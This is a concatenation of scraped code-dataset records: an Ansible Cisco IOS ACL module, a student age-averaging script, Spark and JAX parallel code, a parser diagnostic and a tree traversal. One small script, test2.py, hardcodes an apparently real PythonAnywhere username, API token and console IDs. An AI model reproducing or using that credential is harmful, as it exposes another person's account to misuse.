if not os.path.exists(descriptor):\n        logger.debug(\"Descriptor path '%s' doesn't exist, trying to parse it directly.\"\n                     % descriptor)\n        try:\n            return yaml.safe_load(descriptor)\n        except Exception as ex:\n            raise ConcreateError('Cannot load descriptor.', ex)\n\n    logger.debug(\"Loading descriptor from path '%s'.\" % descriptor)\n\n    with open(descriptor, 'r') as fh:\n        return yaml.safe_load(fh)\n","sub_path":"concreate/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"569901804","text":"#\n# -*- coding: utf-8 -*-\n# Copyright 2019 Red Hat Inc.\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\"\"\"\nThe ios_acl_interfaces class\nIt is in this file where the current configuration (as dict)\nis compared to the provided configuration (as dict) and the command set\nnecessary to bring the current configuration to its desired end-state is\ncreated\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nfrom ansible_collections.ansible.netcommon.plugins.module_utils.network.common.cfg.base import (\n    ConfigBase,\n)\nfrom ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import (\n    to_list,\n)\nfrom ansible_collections.cisco.ios.plugins.module_utils.network.ios.facts.facts import (\n    Facts,\n)\nfrom ansible.module_utils.six import iteritems\nfrom ansible_collections.cisco.ios.plugins.module_utils.network.ios.utils.utils import (\n    remove_duplicate_interface,\n    normalize_interface,\n)\n\n\nclass Acl_Interfaces(ConfigBase):\n    \"\"\"\n    The ios_acl_interfaces class\n    \"\"\"\n\n    gather_subset = [\"!all\", \"!min\"]\n\n    gather_network_resources = [\"acl_interfaces\"]\n\n    def __init__(self, module):\n        super(Acl_Interfaces, self).__init__(module)\n\n    def get_acl_interfaces_facts(self, data=None):\n        \"\"\" Get the 'facts' (the current configuration)\n        :rtype: A dictionary\n        :returns: The current configuration as a dictionary\n        \"\"\"\n        facts, _warnings = Facts(self._module).get_facts(\n            self.gather_subset, self.gather_network_resources, data=data\n        )\n        acl_interfaces_facts = facts[\"ansible_network_resources\"].get(\n            \"acl_interfaces\"\n        )\n        if not acl_interfaces_facts:\n            return []\n\n        return acl_interfaces_facts\n\n    def execute_module(self):\n        \"\"\" Execute the module\n        :rtype: A dictionary\n        :returns: The result from module execution\n        \"\"\"\n        result = {\"changed\": False}\n        commands = list()\n        warnings = list()\n\n        if self.state in self.ACTION_STATES:\n            existing_acl_interfaces_facts = self.get_acl_interfaces_facts()\n        else:\n            existing_acl_interfaces_facts = []\n\n        if self.state in self.ACTION_STATES or self.state == \"rendered\":\n            commands.extend(self.set_config(existing_acl_interfaces_facts))\n\n        if commands and self.state in self.ACTION_STATES:\n            if not self._module.check_mode:\n                self._connection.edit_config(commands)\n            result[\"changed\"] = True\n\n        if self.state in self.ACTION_STATES:\n            result[\"commands\"] = commands\n\n        if self.state in self.ACTION_STATES or self.state == \"gathered\":\n            changed_acl_interfaces_facts = self.get_acl_interfaces_facts()\n        elif self.state == \"rendered\":\n            result[\"rendered\"] = commands\n        elif self.state == \"parsed\":\n            running_config = self._module.params[\"running_config\"]\n            if not running_config:\n                self._module.fail_json(\n                    msg=\"value of running_config parameter must not be empty for state parsed\"\n                )\n            
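# for state \"parsed\", facts come from the supplied running_config text rather than the device\n            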
result[\"parsed\"] = self.get_acl_interfaces_facts(\n data=running_config\n )\n else:\n changed_acl_interfaces_facts = []\n\n if self.state in self.ACTION_STATES:\n result[\"before\"] = existing_acl_interfaces_facts\n if result[\"changed\"]:\n result[\"after\"] = changed_acl_interfaces_facts\n elif self.state == \"gathered\":\n result[\"gathered\"] = changed_acl_interfaces_facts\n\n result[\"warnings\"] = warnings\n\n return result\n\n def set_config(self, existing_acl_interfaces_facts):\n \"\"\" Collect the configuration from the args passed to the module,\n collect the current configuration (as a dict from facts)\n :rtype: A list\n :returns: the commands necessary to migrate the current configuration\n to the deisred configuration\n \"\"\"\n want = self._module.params[\"config\"]\n if want:\n for item in want:\n item[\"name\"] = normalize_interface(item[\"name\"])\n\n have = existing_acl_interfaces_facts\n resp = self.set_state(want, have)\n return to_list(resp)\n\n def set_state(self, want, have):\n \"\"\" Select the appropriate function based on the state provided\n :param want: the desired configuration as a dictionary\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to migrate the current configuration\n to the deisred configuration\n \"\"\"\n commands = []\n\n state = self._module.params[\"state\"]\n if (\n state in (\"overridden\", \"merged\", \"replaced\", \"rendered\")\n and not want\n ):\n self._module.fail_json(\n msg=\"value of config parameter must not be empty for state {0}\".format(\n state\n )\n )\n\n if state == \"overridden\":\n commands = self._state_overridden(want, have)\n elif state == \"deleted\":\n commands = self._state_deleted(want, have)\n elif state == \"merged\" or state == \"rendered\":\n commands = self._state_merged(want, have)\n elif state == \"replaced\":\n commands = self._state_replaced(want, have)\n\n return commands\n\n def _state_replaced(self, want, have):\n \"\"\" The command generator when state is replaced\n :param want: the desired configuration as a dictionary\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to migrate the current configuration\n to the deisred configuration\n \"\"\"\n commands = []\n\n for interface in want:\n for each in have:\n if each[\"name\"] == interface[\"name\"]:\n break\n else:\n continue\n commands.extend(self._clear_config(interface, each, \"replaced\"))\n commands.extend(self._set_config(interface, each))\n # Remove the duplicate interface call\n commands = remove_duplicate_interface(commands)\n\n return commands\n\n def _state_overridden(self, want, have):\n \"\"\" The command generator when state is overridden\n :param want: the desired configuration as a dictionary\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to migrate the current configuration\n to the desired configuration\n \"\"\"\n commands = []\n\n for each in have:\n for interface in want:\n if each[\"name\"] == interface[\"name\"]:\n break\n else:\n # We didn't find a matching desired state, which means we can\n # pretend we recieved an empty desired state.\n interface = dict(name=each[\"name\"])\n commands.extend(self._clear_config(interface, each))\n continue\n commands.extend(self._clear_config(interface, each, \"overridden\"))\n commands.extend(self._set_config(interface, each))\n # Remove the duplicate interface call\n commands = 
remove_duplicate_interface(commands)\n\n return commands\n\n def _state_merged(self, want, have):\n \"\"\" The command generator when state is merged\n :param want: the additive configuration as a dictionary\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to merge the provided into\n the current configuration\n \"\"\"\n commands = []\n\n for interface in want:\n for each in have:\n if each[\"name\"] == interface[\"name\"]:\n break\n else:\n # configuring non-existing interface\n commands.extend(self._set_config(interface, dict()))\n continue\n commands.extend(self._set_config(interface, each))\n\n return commands\n\n def _state_deleted(self, want, have):\n \"\"\" The command generator when state is deleted\n :param want: the objects from which the configuration should be removed\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to remove the current configuration\n of the provided objects\n \"\"\"\n commands = []\n\n if want:\n for interface in want:\n for each in have:\n if each[\"name\"] == interface[\"name\"]:\n break\n else:\n continue\n commands.extend(self._clear_config(interface, each))\n else:\n for each in have:\n commands.extend(self._clear_config(dict(), each))\n\n return commands\n\n def dict_to_set(self, input_dict, test_set, final_set, count=0):\n # recursive function to convert input dict to set for comparision\n test_dict = dict()\n if isinstance(input_dict, dict):\n input_dict_len = len(input_dict)\n for k, v in sorted(iteritems(input_dict)):\n count += 1\n if isinstance(v, list):\n for each in v:\n if isinstance(each, dict):\n input_dict_len = len(each)\n if [\n True for i in each.values() if type(i) == list\n ]:\n self.dict_to_set(each, set(), final_set, count)\n else:\n self.dict_to_set(each, test_set, final_set, 0)\n else:\n if v is not None:\n test_dict.update({k: v})\n if (\n tuple(iteritems(test_dict)) not in test_set\n and count == input_dict_len\n ):\n test_set.add(tuple(iteritems(test_dict)))\n count = 0\n if count == input_dict_len + 1:\n test_set.update(tuple(iteritems(test_dict)))\n final_set.add(tuple(test_set))\n\n def _set_config(self, want, have):\n \"\"\" Function that sets the acls config based on the want and have config\n :param want: want config\n :param have: have config\n :param acl_want: want acl config\n :param afi: acl afi type\n :rtype: A list\n :returns: the commands generated based on input want/have params\n \"\"\"\n commands = []\n\n want_set = set()\n have_set = set()\n self.dict_to_set(want, set(), want_set)\n self.dict_to_set(have, set(), have_set)\n\n for w in want_set:\n want_afi = dict(w).get(\"afi\")\n if have_set:\n\n def common_diff_config_code(diff_list, cmd, commands):\n for each in diff_list:\n try:\n temp = dict(each)\n temp_cmd = cmd + \" {0} {1}\".format(\n temp[\"name\"], temp[\"direction\"]\n )\n if temp_cmd not in commands:\n commands.append(temp_cmd)\n except ValueError:\n continue\n\n for h in have_set:\n have_afi = dict(h).get(\"afi\")\n if have_afi == want_afi:\n if want_afi == \"ipv4\":\n diff = set(w) - set(h)\n if diff:\n cmd = \"ip access-group\"\n common_diff_config_code(diff, cmd, commands)\n if want_afi == \"ipv6\":\n diff = set(w) - set(h)\n if diff:\n cmd = \"ipv6 traffic-filter\"\n common_diff_config_code(diff, cmd, commands)\n break\n else:\n if want_afi == \"ipv4\":\n diff = set(w) - set(h)\n if diff:\n cmd = \"ip access-group\"\n common_diff_config_code(diff, cmd, commands)\n if want_afi 
== \"ipv6\":\n diff = set(w) - set(h)\n if diff:\n cmd = \"ipv6 traffic-filter\"\n common_diff_config_code(diff, cmd, commands)\n else:\n\n def common_want_config_code(want, cmd, commands):\n for each in want:\n if each[0] == \"afi\":\n continue\n temp = dict(each)\n temp_cmd = cmd + \" {0} {1}\".format(\n temp[\"name\"], temp[\"direction\"]\n )\n commands.append(temp_cmd)\n\n if want_afi == \"ipv4\":\n cmd = \"ip access-group\"\n common_want_config_code(w, cmd, commands)\n if want_afi == \"ipv6\":\n cmd = \"ipv6 traffic-filter\"\n common_want_config_code(w, cmd, commands)\n commands.sort()\n if commands:\n interface = want.get(\"name\")\n commands.insert(0, \"interface {0}\".format(interface))\n\n return commands\n\n def _clear_config(self, want, have, state=\"\"):\n \"\"\" Function that deletes the acl config based on the want and have config\n :param acl: acl config\n :param config: config\n :rtype: A list\n :returns: the commands generated based on input acl/config params\n \"\"\"\n commands = []\n\n if want.get(\"name\"):\n interface = \"interface \" + want[\"name\"]\n else:\n interface = \"interface \" + have[\"name\"]\n\n w_access_group = want.get(\"access_groups\")\n temp_want_acl_name = []\n if w_access_group:\n # get the user input afi and acls\n for each in w_access_group:\n want_acls = each.get(\"acls\")\n if want_acls:\n for each in want_acls:\n temp_want_acl_name.append(each.get(\"name\"))\n\n h_access_group = have.get(\"access_groups\")\n if h_access_group:\n for access_grp in h_access_group:\n for acl in access_grp.get(\"acls\"):\n acl_name = acl.get(\"name\")\n acl_direction = acl.get(\"direction\")\n if access_grp.get(\"afi\") == \"ipv4\":\n if acl_name in temp_want_acl_name:\n continue\n cmd = \"no ip access-group\"\n cmd += \" {0} {1}\".format(acl_name, acl_direction)\n commands.append(cmd)\n elif access_grp.get(\"afi\") == \"ipv6\":\n if acl_name in temp_want_acl_name:\n continue\n cmd = \"no ipv6 traffic-filter\"\n cmd += \" {0} {1}\".format(acl_name, acl_direction)\n commands.append(cmd)\n if commands:\n # inserting the interface at first\n commands.insert(0, interface)\n\n return commands\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/cisco/ios/plugins/module_utils/network/ios/config/acl_interfaces/acl_interfaces.py","file_name":"acl_interfaces.py","file_ext":"py","file_size_in_byte":15822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"319180631","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 25 17:00:05 2020\n\n@author: loris\n\nFaça um programa que peça para n pessoas a sua idade, ao final o programa devera verificar se a\nmédia de idade da turma varia entre 0 e 25,26 e 60 e maior que 60;\ne então, dizer se a turma é jovem, adulta ou idosa, conforme a média calculada.\n\n\n\"\"\"\nimport statistics as stc\n\nrepete = True\nlista = []\nprint(\"Digite n para encerrar\")\nwhile repete == True:\n entrada = input(\"Insira uma idade: \")\n if entrada == 'n' or entrada == 'N':\n repete = False\n continue\n numero = int(entrada)\n lista.append(numero)\n\nmedia = stc.mean(lista)\nprint(\"A média da turma é de \"+str(round(media,2))+\" anos\")\nif media >= 0 and media <= 25:\n print(\"A turma é jovem! \")\nif media >= 26 and media <= 60:\n print(\"A turma é adulta! 
\")\nif media > 60:\n print(\"A turma é idosa!\")","sub_path":"3 - Estrutura de Repetição/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"228048275","text":"import requests\r\nimport json\r\nmy_domain = 'Sampreet.pythonanywhere.com'\r\nusername = 'Sampreet'\r\ntoken = 'ca4f0a88a6e079a4a36d7dc50eef83b61379ce69'\r\nid1 = '12195600'\r\nid2 = '11969836'\r\ninput=\"print(3)\"\r\n#params = {'input': input,}\r\npayload = {'input':input,}\r\nresponse = requests.post('https://www.pythonanywhere.com/api/v0/user/{username}/consoles/{id2}/send_input/'.format(username=username, domain=my_domain,id2=id2),\r\n headers={'Authorization': 'Token {token}'.format(token=token),'Content-Type': 'application/json'},data=json.dumps(payload))\r\nif response.status_code == 200:\r\n print('All OK')\r\n print(response.text)\r\nelse:\r\n print('Got unexpected status code {}: {!r}'.format(response.status_code, response.content))\r\n \r\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"555392816","text":"from depparse.trans_based.parse import PartialParse\nimport torch\n\n\n_row_format = '{:10s}{:6s}{:20s}{:6s}{:20s}'\n_first_row = _row_format.format('WORD', 'HEAD', 'LABEL', 'PHEAD', 'PLABEL')\n\n\ndef print_fault(example, parser, fo, res_arcs=None):\n word = [parser.id2tok[i] for i in example['word'][1:]]\n head = [str(i) for i in example['head'][1:]]\n label = [parser.id2tok[i] if i in parser.id2tok else '' for i in example['label'][1:]]\n assert len(word) == len(head) and len(word) == len(label)\n\n if res_arcs is None:\n make_up = ['' for _ in range(len(word))]\n output = zip(word, head, label, make_up, make_up)\n else:\n assert len(word) == len(res_arcs)\n sorted_arcs = sorted(res_arcs, key=lambda t: t[1])\n p_head = [str(t[0]) for t in sorted_arcs]\n p_label = [parser.id2tok[t[2]] if t[2] in parser.id2tok else '' for t in sorted_arcs]\n output = zip(word, head, label, p_head, p_label)\n\n output = [_row_format.format(*list(row)) for row in output]\n fo.write('\\n'.join(output) + '\\n\\n')\n\n\ndef parse_and_output(model, data, parser, fo):\n n_ex = 0\n n_match = 0\n for example in data:\n ex = PartialParse(example)\n ex.safe_parse(model, parser)\n if not ex.success:\n print_fault(example, parser, fo)\n else:\n correct, n_words = ex.accuracy(parser.unlabeled)\n if correct < n_words:\n print_fault(example, parser, fo, res_arcs=ex.arcs)\n else:\n n_match += 1\n n_ex += 1\n\n print('Output / Total: {:d} / {:d}'.format(n_ex - n_match, n_ex))\n\n\ndef diagnosing(model, data, parser, output_file, **kwargs):\n model.eval()\n with torch.set_grad_enabled(False), open(output_file, 'w') as fo:\n fo.write(_first_row + '\\n')\n parse_and_output(model, data, parser, fo)\n","sub_path":"depparse/diagnosis/check_fault.py","file_name":"check_fault.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"293392495","text":"from pyspark import SparkConf, SparkContext\nimport sys\nimport random\nimport operator\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\n\n \ndef euler(partitions):\n total_iterations = 0\n\n for i in range(partitions):\n sum = 0.0\n while (sum <1.0):\n \n rnumber = random.random()\n sum += rnumber\n total_iterations += 1\n \n return 
total_iterations\n \n\ndef main(inputs):\n group = 10\n s = [inputs // group] * group\n RDDrange=sc.parallelize(s, numSlices=15)\n newRDD = RDDrange.map(euler) \n iterations = newRDD.reduce(operator.add)\n finaleuler = float (iterations) / inputs\n \n print (\"Euler is \", finaleuler)\n\n\nif __name__ == '__main__':\n conf = SparkConf().setAppName('euler')\n sc = SparkContext(conf=conf)\n assert sc.version >= '2.3' # make sure we have Spark 2.3+\n inputs = sys.argv[1]\n main(int(inputs))\n","sub_path":"A3/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"16351665","text":"# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom collections import namedtuple, defaultdict\nfrom distutils.util import strtobool\nfrom contextlib import contextmanager\nimport itertools as it\nimport operator as op\nimport os\n\nimport numpy as onp\nimport six\nfrom six.moves import reduce\n\nfrom .. import core\nfrom .. import ad_util\nfrom .. import tree_util\nfrom .. import linear_util as lu\nfrom ..abstract_arrays import ShapedArray\nfrom ..util import partial, unzip2, concatenate, safe_map, prod\nfrom ..lib import xla_bridge as xb\nfrom .xla import (xla_shape, xla_destructure, translation_rule, abstractify,\n xla_shape_to_result_shape, jaxpr_computation)\nfrom .partial_eval import trace_to_subjaxpr, merge_pvals, JaxprTrace, PartialVal\nfrom .batching import dimsize, broadcast\nfrom . import parallel\nfrom . import xla\nfrom . 
import partial_eval as pe\n\nmap = safe_map\n\n\n### util\n\n\ndef chunk_transform(fun, chunksize, name, in_axes, out_axes_dst):\n  \"\"\"Rewrite SPMD operations to act first on local chunks then cross-replica.\"\"\"\n  temp_name = TempAxisName()\n  fun = parallel.axisvar_split(fun, name, (temp_name, name))\n  fun, out_axes_src = parallel.pmap_transform(fun, temp_name, in_axes)\n  fun = move_output_axis_transform(fun, name, chunksize, out_axes_src, out_axes_dst)\n  return fun\n\nclass TempAxisName(object):\n  def __repr__(self):\n    return '<TempAxisName {}>'.format(hex(id(self)))\n\n@lu.transformation\ndef move_output_axis_transform(name, chunksize, src, dst, *args):\n  \"\"\"Function transformation that moves output axes from src to dst.\"\"\"\n  ans = yield args\n  yield moveaxis(name, chunksize, dst, src(), ans)\n\ndef moveaxis(name, sz, dst, src, x):\n  aval = core.get_aval(x)\n  if type(aval) is core.AbstractTuple:\n    if type(src) is tuple and type(dst) is tuple:\n      return core.pack(map(partial(moveaxis, name, sz), dst, src, x))\n    elif type(src) is tuple:\n      return core.pack(map(partial(moveaxis, name, sz, dst), src, x))\n    elif type(dst) is tuple:\n      srcs = (src,) * len(dst)\n      return core.pack(map(partial(moveaxis, name, sz), dst, srcs, x))\n    else:\n      return core.pack(map(partial(moveaxis, name, sz, dst, src), x))\n  elif isinstance(aval, ShapedArray):\n    dst_ = (dst % aval.ndim) if dst is not None and aval.ndim else dst\n    if src == dst_:\n      return x\n    else:\n      if src is None:\n        x = broadcast(x, sz, force_broadcast=True)\n        src = 0\n        dst_ = dst % (aval.ndim + 1)\n      elif dst is None:\n        return x.sum(src).psum('i')\n      if src == dst_:\n        return x\n      else:\n        perm = [i for i in range(onp.ndim(x)) if i != src]\n        perm.insert(dst_, src)\n        return x.transpose(perm)\n  else:\n    raise TypeError(type(aval))\n\ndef chunk_aval(chunksize, aval, axis):\n  \"\"\"Transform an abstract value's shape to have chunksize extent along axis.\"\"\"\n  if axis is None:\n    return aval\n  else:\n    shape = list(aval.shape)\n    shape[axis] = chunksize\n    return ShapedArray(tuple(shape), aval.dtype)\n\n\ndef build_axis_spec_tree(spec, treedef):\n  \"\"\"Given a JTupleTreeDef, canonicalize an axis spec for that treedef.\"\"\"\n  if treedef is xla.leaf:\n    return spec\n  elif type(spec) is tuple:\n    if treedef.child_specs:\n      return tuple(map(build_axis_spec_tree, spec, treedef.child_specs))\n    else:\n      return ()\n  else:\n    return tuple(map(partial(build_axis_spec_tree, spec), treedef.child_specs))\n\ndef flatten(x):\n  if type(x) is tuple:\n    return tuple(_flatten(x))\n  else:\n    return x\n\ndef _flatten(x):\n  if type(x) is tuple:\n    return it.chain.from_iterable((_flatten(elt) for elt in x))\n  else:\n    return [x]\n\n\ndef shard_arg(mesh_spec, mesh_axis, axis, arg):\n  \"\"\"Shard and device_put an input array argument along a logical axis.\"\"\"\n  num_replicas = xb.get_replica_count()\n  if prod(mesh_spec) != num_replicas:\n    msg = \"mesh spec {} total size of {} doesn't match number of replicas {}.\"\n    raise ValueError(msg.format(mesh_spec, prod(mesh_spec), num_replicas))\n  shards = split_array(arg, mesh_spec[mesh_axis], axis)\n  replica_shards = [shards[i] for i in shard_assignments(mesh_spec, mesh_axis)]\n  return map(xb.device_put, replica_shards, range(num_replicas))\n\ndef unshard_output(mesh_spec, mesh_axis, out_axis, out_shards):\n  \"\"\"Collect and concatenate sharded device results.\"\"\"\n  _, ids = onp.unique(shard_assignments(mesh_spec, mesh_axis), return_index=True)\n  if out_axis is None:\n    return out_shards[0]\n  elif type(out_axis) is int:\n    shards = [out_shards[i] for i in ids]\n    return onp.concatenate(shards, out_axis)\n  else:\n    raise TypeError(type(out_axis))\n\ndef shard_assignments(mesh_spec, mesh_axis):\n  \"\"\"Given a mesh axis along which to shard data, compute replica assignments.\"\"\"\n  indices_shape = [1] * len(mesh_spec)\n  indices_shape[mesh_axis] = mesh_spec[mesh_axis]\n  indices = onp.arange(mesh_spec[mesh_axis]).reshape(indices_shape)\n  return tuple(onp.broadcast_to(indices, mesh_spec).ravel())\n\ndef replica_groups(mesh_spec, mesh_axis):\n  \"\"\"Given a mesh axis along which to operate, compute XLA replica_groups.\"\"\"\n  groups = onp.split(onp.arange(prod(mesh_spec)).reshape(mesh_spec),\n                     mesh_spec[mesh_axis], axis=mesh_axis)\n  groups = map(onp.ravel, groups)\n  return tuple(tuple(group) for group in zip(*groups))\n\ndef split_array(x, num_splits, axis):\n  \"\"\"A special-case of numpy.split implemented in terms of indexing.\"\"\"\n  if axis is None:\n    return [x] * num_splits\n  else:\n    assert x.shape[axis] % num_splits == 0\n    split_size = x.shape[axis] // num_splits\n    def get_nth_subarray(n):\n      idx = [slice(None)] * x.ndim\n      idx[axis] = slice(n * split_size, (n+1) * split_size)\n      return x[tuple(idx)]\n    return map(get_nth_subarray, range(num_splits))\n\n\ndef chunk_size(axis_name, mesh_axis, in_axes, args):\n  \"\"\"Compute the chunk size for mapped axes, checking for errors.\"\"\"\n  global mesh_spec\n  axis_sizes = reduce(set.union, map(dimsize, in_axes, args))\n  if len(axis_sizes) == 0:\n    msg = \"axis name '{}' not bound to any input axes.\"\n    raise ValueError(msg.format(axis_name))\n  elif len(axis_sizes) > 1:\n    msg = \"axis name '{}' bound to multiple axes with different sizes: {}.\"\n    raise ValueError(msg.format(axis_name, axis_sizes))\n  else:\n    axis_size = axis_sizes.pop()\n    if axis_size % mesh_spec()[mesh_axis]:\n      msg = (\"axis name '{}' bound to input axis of size {} mapped to mesh \"\n             \"axis index {} with size {}, which does not evenly divide {}.\")\n      raise ValueError(msg.format(axis_name, axis_size, mesh_axis,\n                                  mesh_spec()[mesh_axis], axis_size))\n\n  return axis_size // mesh_spec()[mesh_axis]\n\n\ndef mesh_spec():\n  global _mesh_spec\n  return _mesh_spec or (xb.get_replica_count(),)\n_mesh_spec = None\n\n@contextmanager\ndef device_mesh(spec):\n  global _mesh_spec\n  _mesh_spec, prev_spec = spec, _mesh_spec\n  yield\n  _mesh_spec = prev_spec\n\n# axis environments are tiny, so we don't worry about the cost of copying keys\ndef new_axis_env(d): return d\ndef extend_axis_env(d1, d2): return dict(d1, **d2)\n\n\n### xla_pcall\n\n\ndef compile_replicated(jaxpr, axis_env, consts, *abstract_args):\n  arg_shapes = list(map(xla_shape, abstract_args))\n  built_c = replicated_computation(jaxpr, axis_env, consts, (), *arg_shapes)\n  result_shape = xla_shape_to_result_shape(built_c.GetReturnValueShape())\n  return built_c.Compile(arg_shapes, xb.get_compile_options()), result_shape\n\ndef replicated_computation(jaxpr, axis_env, const_vals, freevar_shapes,\n                           *arg_shapes):\n  c = xb.make_computation_builder(\"replicated_computation\")\n\n  def read(v):\n    return env[v]\n\n  def write(v, node):\n    assert node is not None\n    env[v] = node\n\n  env = {}\n  consts_env = dict(zip(jaxpr.constvars, const_vals))\n  write(core.unitvar, c.Tuple())\n  map(write, jaxpr.constvars, map(c.Constant, const_vals))\n  map(write, jaxpr.freevars, map(c.ParameterWithShape, freevar_shapes))\n  map(write, jaxpr.invars, map(c.ParameterWithShape, arg_shapes))\n  for eqn in jaxpr.eqns:\n    in_nodes = map(read, eqn.invars)\n    if eqn.primitive in parallel_translation_rules:\n      rule = 
parallel_translation_rules[eqn.primitive]\n device_groups = axis_env[eqn.params['axis_name']]\n params = {k: eqn.params[k] for k in eqn.params if k != 'axis_name'}\n ans = rule(c, *in_nodes, device_groups=device_groups, **params)\n else:\n if eqn.bound_subjaxprs:\n in_shapes = map(c.GetShape, in_nodes)\n if eqn.primitive is xla_pcall_p:\n device_groups = replica_groups(mesh_spec(), eqn.params['mesh_axis'])\n new_axis_binding = {eqn.params['axis_name'] : device_groups}\n (subjaxpr, const_bindings, freevar_bindings), = eqn.bound_subjaxprs\n subc = replicated_computation(\n subjaxpr, extend_axis_env(new_axis_binding, axis_env),\n [consts_env[b] for b in const_bindings],\n map(c.GetShape, map(read, freevar_bindings)),\n *in_shapes)\n subfun = (subc, tuple(map(read, freevar_bindings)))\n ans = translation_rule(eqn.primitive)(c, subfun, *in_nodes)\n else:\n subcs = [jaxpr_computation(subjaxpr,\n [consts_env[b] for b in const_bindings],\n map(c.GetShape, map(read, freevar_bindings)),\n *in_shapes)\n for subjaxpr, const_bindings, freevar_bindings\n in eqn.bound_subjaxprs]\n subfuns = [(subc, tuple(map(read, freevar_bindings)))\n for subc, (_, _, freevar_bindings)\n in zip(subcs, eqn.bound_subjaxprs)]\n ans = translation_rule(eqn.primitive)(c, *(subfuns + in_nodes), **eqn.params)\n else:\n ans = translation_rule(eqn.primitive)(c, *in_nodes, **eqn.params)\n\n out_nodes = xla_destructure(c, ans) if eqn.destructure else [ans]\n map(write, eqn.outvars, out_nodes)\n return c.Build(read(jaxpr.outvar))\n\n\ndef xla_pcall_impl(fun, *args, **params):\n axis_name = params.pop('axis_name') # e.g. 'i'\n in_axes = params.pop('in_axes') # e.g. (0, None) or (0, 1)\n out_axes = params.pop('out_axes') # e.g. 0 or (None, 1)\n mesh_axis = params.pop('mesh_axis') # e.g. 0 or 1\n assert not params\n\n flat_args, in_trees = unzip2(map(xla.tree_flatten, args))\n flat_args = concatenate(flat_args)\n fun, out_tree = xla.flatten_fun(fun, in_trees)\n\n flat_in_axes = flatten(tuple(map(build_axis_spec_tree, in_axes, in_trees)))\n compiled_fun = xla_parallel_callable(fun, axis_name, flat_in_axes, mesh_axis,\n mesh_spec(), *map(abstractify, flat_args))\n flat_out_axes = flatten(build_axis_spec_tree(out_axes, out_tree()))\n flat_ans = compiled_fun(out_tree(), flat_out_axes, *flat_args)\n\n if out_tree() is xla.leaf:\n return flat_ans\n else:\n return xla.build_tree(iter(flat_ans), out_tree())\n\n@lu.memoize\ndef xla_parallel_callable(fun, axis_name, in_axes, mesh_axis, mesh_spec,\n *abstract_args):\n chunksize = next((x.shape[ax] // mesh_spec[mesh_axis]\n for x, ax in zip(abstract_args, in_axes)\n if ax is not None and type(x) is ShapedArray), None)\n if chunksize is not None:\n abstract_args = map(partial(chunk_aval, chunksize), abstract_args, in_axes)\n axis_env = new_axis_env({axis_name: replica_groups(mesh_spec, mesh_axis)})\n pvals = [PartialVal((aval, core.unit)) for aval in abstract_args]\n with core.new_master(JaxprTrace, True) as master:\n jaxpr, (pval, consts, env) = trace_to_subjaxpr(fun, master).call_wrapped(pvals)\n assert not env\n compiled, _ = compile_replicated(jaxpr, axis_env, consts, *abstract_args)\n del master, consts, jaxpr, env\n return partial(execute_replicated, in_axes, mesh_axis, mesh_spec, compiled, pval)\n\ndef execute_replicated(in_axes, mesh_axis, mesh_spec, compiled, pval,\n out_tree, out_axes, *args):\n input_bufs = map(partial(shard_arg, mesh_spec, mesh_axis), in_axes, args)\n input_bufs = zip(*input_bufs) if input_bufs else [[]] * xb.get_replica_count()\n out_bufs = 
compiled.ExecutePerReplica(input_bufs)\n out_shards = [merge_pvals(buf.to_py(), pval) for buf in out_bufs]\n if out_tree is xla.leaf:\n return unshard_output(mesh_spec, mesh_axis, out_axes, out_shards)\n else:\n return map(partial(unshard_output, mesh_spec, mesh_axis), out_axes,\n zip(*out_shards))\n\n\nxla_pcall_p = core.Primitive('xla_pcall')\nxla_pcall = partial(core.call_bind, xla_pcall_p)\nxla_pcall_p.def_custom_bind(xla_pcall)\nxla_pcall_p.def_impl(xla_pcall_impl)\nxla.translations[xla_pcall_p] = xla.xla_call_translation_rule\n\n\nparallel_translation_rules = {}\n","sub_path":"jax/interpreters/pxla.py","file_name":"pxla.py","file_ext":"py","file_size_in_byte":13323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"108285925","text":"from typing import List\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n res = []\n stk = []\n while root is not None or stk:\n while root is not None:\n stk.append(root)\n root = root.left\n\n root = stk.pop()\n res.append(root.val)\n root = root.right\n return res\n\n def inorderTraversal2(self, root: TreeNode) -> List[int]:\n res = []\n stk = [[0, root]]\n while stk:\n flag, cur = stk.pop()\n if cur is None:\n 